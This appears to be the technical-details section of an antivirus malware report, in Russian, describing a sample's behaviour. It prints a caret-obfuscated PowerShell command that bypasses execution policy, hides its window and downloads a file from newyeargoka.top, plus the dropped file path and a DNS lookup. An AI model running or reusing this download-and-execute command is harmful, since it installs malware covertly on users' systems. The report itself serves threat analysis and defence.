Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Po^w^E^rsHe^l^L^.EX^e^ -exEC^UtIoNp^oLiCY byPa^Ss ^-NOpRoF^iLe ^-wINdo^WS^tYlE^ ^hidDen ^(N^Ew-^objEct ^s^y^STe^m.N^e^t.wEb^cl^IenT).^DoWN^l^O^adfILe^(^'http://newyeargoka.t...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /C "Po^w^E^rsHe^l^L^.EX^e^ -exEC^UtIoNp^oLiCY byPa^Ss ^-NOpRoF^iLe ^-wINdo^WS^tYlE^ ^hidDen ^(N^Ew-^objEct ^s^y^STe^m.N^e^t.wEb^cl^IenT).^DoWN^l^O^adfILe^(^'http://newyeargoka.t...' (со скрытым окном)